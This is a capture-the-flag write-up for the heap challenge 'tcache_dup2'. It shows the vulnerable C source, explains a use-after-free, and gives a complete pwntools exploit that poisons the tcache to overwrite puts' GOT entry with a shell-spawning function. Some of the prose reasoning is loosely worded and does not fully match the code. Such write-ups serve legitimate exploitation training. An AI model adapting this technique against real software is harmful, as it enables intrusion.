Write-up of the challenge “tcache_dup2”#

This challenge is part of the “Binary exploitation” category and is in Level 2.

Goal of the challenge#

The objective of this challenge is to abuse the UAF vulnerability.

Program structure#

1
#include <stdio.h>
2
#include <stdlib.h>
3
#include <signal.h>
4
#include <unistd.h>
5

6
char *ptr[7];
7

8
void initialize()
9
{
10
    setvbuf(stdin, NULL, _IONBF, 0);
11
    setvbuf(stdout, NULL, _IONBF, 0);
12
}
13

14
void create_heap(int idx)
15
{
16
    size_t size;
17

18
    if (idx >= 7)
19
        exit(0);
20

21
    printf("Size: ");
22
    scanf("%ld", &size);
23

24
    ptr[idx] = malloc(size);
25

26
    if (!ptr[idx])
27
        exit(0);
28

29
    printf("Data: ");
30
    read(0, ptr[idx], size - 1);
31
}
32

33
void modify_heap()
34
{
35
    size_t size, idx;
36

37
    printf("idx: ");
38
    scanf("%ld", &idx);
39

40
    if (idx >= 7)
41
        exit(0);
42

43
    printf("Size: ");
44
    scanf("%ld", &size);
45

46
    if (size > 0x10)
47
        exit(0);
48

49
    printf("Data: ");
50
    read(0, ptr[idx], size);
51
}
52

53
void delete_heap()
54
{
55
    size_t idx;
56

57
    printf("idx: ");
58
    scanf("%ld", &idx);
59
    if (idx >= 7)
60
        exit(0);
61

62
    if (!ptr[idx])
63
        exit(0);
64

65
    free(ptr[idx]);
66
}
67

68
void get_shell()
69
{
70
    system("/bin/sh");
71
}
72
int main()
73
{
74
    int idx;
75
    int i = 0;
76

77
    initialize();
78

79
    while (1)
80
    {
81
        printf("1. Create heap\n");
82
        printf("2. Modify heap\n");
83
        printf("3. Delete heap\n");
84
        printf("> ");
85

86
        scanf("%d", &idx);
87

88
        switch (idx)
89
        {
90
        case 1:
91
            create_heap(i);
92
            i++;
93
            break;
94
        case 2:
95
            modify_heap();
96
            break;
97
        case 3:
98
            delete_heap();
99
            break;
100
        default:
101
            break;
102
        }
103
    }
104
}

Security breach#

The vulnerability here is:

free(ptr[idx]);, not setting also the pointer to null.

Solution#

So since it checks

1
if (!ptr[idx])
2
        exit(0);

if the chunk is already freed then it will exist that is mitigation for double free vulnerability, however we can bypass it! We can start by creating two chunks and then freeing them both and then we put puts_got in the first chunk in the tcache which is B. You notice how we first created chunk A and then chunk B. We freed first chunk A(0) and then chunk B(1) and because the t-cache is STACK(LIFO) which means last freed would be on top so that makes the t-cache look like this:

B -> A

Then we create another chunk with an offset of 8 bytes and then another chunk with get_shell.

You might ask why add the 8 bytes?

Well it is because we need to overwrite the pointer of the puts_got chunk to make it point to get_shell chunk.

1
from pwn import *
2

3
p = remote("host3.dreamhack.games", 8291)
4

5

6
e = ELF("tcache_dup2")
7

8
get_shell = e.sym["get_shell"]
9
got_puts = e.got["puts"]
10

11

12
def create(data):
13
    p.sendline(b'1')
14

15
    p.sendlineafter(b"Size: ", str(0x20).encode())
16

17
    p.sendlineafter(b"Data: ", data)
18

19

20
def delete(idx):
21
    p.sendline(b'3')
22

23
    p.sendlineafter(b"idx: ", str(idx).encode())
24

25

26
def modify(idx, data):
27
    p.sendline(b'2')
28
    p.sendlineafter(b"idx: ", str(idx).encode())
29
    p.sendlineafter(b"Size: ", str(0x10).encode())
30
    p.sendlineafter(b"Data: ", data)
31

32

33
create(b'A' * 8)
34
create(b'B' * 8)
35

36
delete(0)
37
delete(1)
38

39
modify(1, p64(got_puts))
40
create(b'A' * 8)
41
create(p64(get_shell))
42

43
p.interactive()